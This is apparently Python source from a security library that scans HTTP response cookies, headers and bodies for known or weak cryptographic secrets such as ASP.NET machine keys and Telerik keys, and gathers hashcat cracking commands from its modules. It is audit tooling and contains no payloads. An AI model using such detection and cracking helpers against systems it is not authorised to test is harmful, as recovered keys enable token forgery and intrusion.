        str_path = str_path.lower().split(iis_app_in_path, 1)[1] if iis_app_in_path in str_path.lower() else str_path
        str_path = str_path[1:] if str_path.startswith("/") else str_path
        str_path = str_path.replace(".", "_").replace("/", "_")
        str_path = self.remove_slash_from_path_if_needed(str_path)
        return str_path

    @staticmethod
    def extract_from_url(url):
        parsed_url = urlparse(url)
        str_path = parsed_url.path
        iis_app_in_path = str_path.rsplit("/", 1)[0] or "/"
        return str_path, iis_app_in_path

    def get_specific_purposes(self):
        str_path, iis_app_in_path = self.extract_from_url(self.url)
        template_source = self.simulate_template_source_directory(iis_app_in_path)
        gettype = self.simulate_get_type_name(str_path, iis_app_in_path)
        specificPurposes = []
        specificPurposes.append(f"TemplateSourceDirectory: {template_source.upper()}")
        specificPurposes.append(f"Type: {gettype.upper()}")
        return specificPurposes



class BadsecretsException(Exception):
    pass


class LoadResourceException(BadsecretsException):
    pass


class Telerik_EncryptionKey_Exception(BadsecretsException):
    pass


class CarveException(BadsecretsException):
    pass



import re
import os
import hashlib
import requests
import badsecrets.errors
from abc import abstractmethod

generic_base64_regex = re.compile(
    r"^(?:[A-Za-z0-9+\/]{4}){8,}(?:[A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}={2})$"
)


class BadsecretsBase:
    identify_regex = re.compile(r".+")
    description = {"product": "Undefined", "secret": "Undefined", "severity": "Undefined"}

    hash_sizes = {"SHA1": 20, "MD5": 16, "SHA256": 32, "SHA384": 48, "SHA512": 64}
    hash_algs = {
        "SHA1": hashlib.sha1,
        "MD5": hashlib.md5,
        "SHA256": hashlib.sha256,
        "SHA384": hashlib.sha384,
        "SHA512": hashlib.sha512,
        "AES": hashlib.sha1,
        "3DES": hashlib.sha1,
    }

    check_secret_args = 1

    def __init__(self, custom_resource=None, **kwargs):
        self.custom_resource = custom_resource

        if self.custom_resource:
            if not os.path.exists(self.custom_resource):
                raise badsecrets.errors.LoadResourceException(
                    f"Custom resource [{self.custom_resource}] does not exist"
                )

    @abstractmethod
    def check_secret(self, secret):
        raise NotImplementedError

    @classmethod
    def get_description(self):
        return self.description

    def get_product_from_carve(self, regex_search):
        return regex_search.groups()[0]

    def get_hashcat_commands(self, s):
        return None

    def load_resources(self, resource_list):
        filepaths = []
        if self.custom_resource:
            filepaths.append(self.custom_resource)
        for r in resource_list:
            filepaths.append(f"{os.path.dirname(os.path.abspath(__file__))}/resources/{r}")
        for filepath in filepaths:
            with open(filepath) as r:
                for l in r.readlines():
                    if len(l) > 0:
                        yield l

    def carve_to_check_secret(self, s, **kwargs):
        if s.groups():
            r = self.check_secret(s.groups()[0])
            return r

    @abstractmethod
    def carve_regex(self):
        return None

    def carve(self, body=None, cookies=None, headers=None, requests_response=None, **kwargs):
        results = []

        if not body and not cookies and not headers and requests_response == None:
            raise badsecrets.errors.CarveException("Either body/headers/cookies or requests_response required")

        if requests_response != None:
            if body or cookies or headers:
                raise badsecrets.errors.CarveException("Body/cookies/headers and requests_response cannot both be set")

            if type(requests_response) == requests.models.Response:
                body = requests_response.text
                cookies = dict(requests_response.cookies)
                headers = requests_response.headers
            else:
                raise badsecrets.errors.CarveException("requests_response must be a requests.models.Response object")

        if cookies:
            if type(cookies) != dict:
                raise badsecrets.errors.CarveException("Header argument must be type dict")
            for k, v in cookies.items():
                r = self.check_secret(v)
                if r:
                    r["type"] = "SecretFound"
                    r["product"] = v
                    r["location"] = "cookies"
                    results.append(r)

        if headers:
            for header_value in headers.values():
                # Check if we have a match outright
                r = self.check_secret(header_value)
                if r:
                    r["type"] = "SecretFound"
                    r["product"] = header_value
                    r["location"] = "headers"
                    results.append(r)
                # If we dont, we will only be able to add context if we have a match with carve_regex()
                elif self.carve_regex():
                    s = re.search(self.carve_regex(), header_value)
                    if s:
                        r = self.carve_to_check_secret(s)
                        if r:
                            r["type"] = "SecretFound"
                        # the carve regex hit but no secret was found
                        else:
                            r = {"type": "IdentifyOnly"}
                            r["hashcat"] = self.get_hashcat_commands(s)
                        if "product" not in r.keys():
                            r["product"] = self.get_product_from_carve(s)
                        r["location"] = "headers"
                        results.append(r)

        if body:
            if type(body) != str:
                raise badsecrets.errors.CarveException("Body argument must be type str")
            if self.carve_regex():
                s = re.search(self.carve_regex(), body)
                if s:
                    r = self.carve_to_check_secret(s, url=kwargs.get("url", None))
                    if r:
                        r["type"] = "SecretFound"
                    else:
                        r = {"type": "IdentifyOnly"}
                        r["hashcat"] = self.get_hashcat_commands(s.groups()[0])
                    if "product" not in r.keys():
                        r["product"] = self.get_product_from_carve(s)
                    r["location"] = "body"
                    results.append(r)

        for r in results:
            r["description"] = self.get_description()

        # Don't report an IdentifyOnly result if we have a SecretFound result for the same 'product'
        secret_found_results = set(d["product"] for d in results if d["type"] == "SecretFound")
        return [d for d in results if not (d["type"] == "IdentifyOnly" and d["product"] in secret_found_results)]

    @classmethod
    def identify(self, product):
        if re.match(self.identify_regex, product):
            return True
        return False

    @staticmethod
    def search_dict(d, query):
        items = [key for key, value in d.items() if query == value]
        if items:
            return items


def hashcat_all_modules(product, detecting_module=None, *args):
    hashcat_candidates = []
    for m in BadsecretsBase.__subclasses__():
        if detecting_module == m.__name__ or detecting_module == None:
            x = m()
            if x.identify(product):
                hashcat_commands = x.get_hashcat_commands(product)
                if hashcat_commands:
                    for hcc in hashcat_commands:
                        z = {
                            "detecting_module": m.__name__,
                            "hashcat_command": hcc["command"],
                            "hashcat_description": hcc["description"],
                        }
                        hashcat_candidates.append(z)
    return hashcat_candidates


def check_all_modules(*args, **kwargs):
    for m in BadsecretsBase.__subclasses__():
        x = m(custom_resource=kwargs.get("custom_resource", None))
        r = x.check_secret(*args[0 : x.check_secret_args])
        if r:
            r["detecting_module"] = m.__name__
            r["description"] = x.get_description()

            # allow the module to provide an amended product, if needed
            if "product" not in r.keys():
                r["product"] = args[0]
            r["location"] = "manual"
            return r
    return None


def carve_all_modules(**kwargs):
    results = []
    for m in BadsecretsBase.__subclasses__():
        x = m(custom_resource=kwargs.get("custom_resource", None))
        r_list = x.carve(**kwargs)
        if len(r_list) > 0:
            for r in r_list:
                r["detecting_module"] = m.__name__
                results.append(r)
    if results:
        return results
